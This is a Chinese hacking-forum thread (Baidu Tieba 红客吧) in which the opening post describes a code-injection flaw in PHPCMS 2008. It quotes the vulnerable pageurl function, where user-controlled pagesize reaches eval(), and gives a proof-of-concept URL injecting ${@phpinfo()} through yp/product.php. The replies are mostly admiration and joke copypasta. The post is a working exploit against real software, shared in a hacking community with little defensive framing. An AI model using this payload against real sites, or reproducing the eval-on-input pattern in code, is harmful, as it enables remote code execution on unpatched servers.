网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索
红客吧 关注:138,488贴子:688,162
  • 10回复贴,共1

phpcms 2008代码注射

来源:http://www.wooyun.org/bugs/wooyun-2010-02984
上面还没公开细节,找了下,是yp/prodcut.php页面中pagesize参数的问题.
pagesize的值经过一系列xxoo后,被代入pageurl函数中(在include/global.func.php中)
function pageurl($urlrule, $page, $array = array())
{
@extract($array, EXTR_SKIP);
if(strpos($urlrule, '|'))
{
$urlrules = explode('|', $urlrule);
$urlrule = $page < 2 ? $urlrules[0] : $urlrules[1];
}
eval("\$url = \"$urlrule\";"); //代码执行
return $url;
}
PoC:
http://www.baidu.com/yp/product.php?pagesize=${@phpinfo()}






2025-08-21 14:13:51
广告
不感兴趣
开通SVIP免广告
2


3


4
说好的iphone4呢


拜大牛…
- -等着楼主给我做庆功宴


大牛你好


膜拜 大牛!


2025-08-21 14:07:51
广告
不感兴趣
开通SVIP免广告
不错 最近没时间搞站


好帖啊,难得一见的好贴!楼主的文章简直是惊天地,泣鬼神, 图文并茂、嬉笑怒骂、指点论坛、激扬文、带给我们的仅仅是视觉上的感受吗? 大错特错,楼主的文章带给我们的是心灵深处的震撼!楼主的文章是宣言书;楼主的文章是宣传队;楼主的文章是播种机;楼主的文章带来的是读者的欣喜和论坛的繁荣。 苍天之下,厚土之上,竟有如此奇人异士、文人墨客!讥讽于谈笑间,笑骂于无形中,层次之高,境界之深,非我等所能匹及,偶像啊!!!仿高人此文,照作一篇,以表仰慕之情。 在逐行逐句地看完此帖后,我的心久久不能压抑的喜悦,震动了整个生命!怎会有如此精妙绝伦的好贴?偶潜水网络bbs多年,自以为贴在人外,何肖评说,岂可妄动情谊呼!未曾想到今日竟有如此好贴现于眼前,激动啊……


哟西


扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 10回复贴,共1
分享到: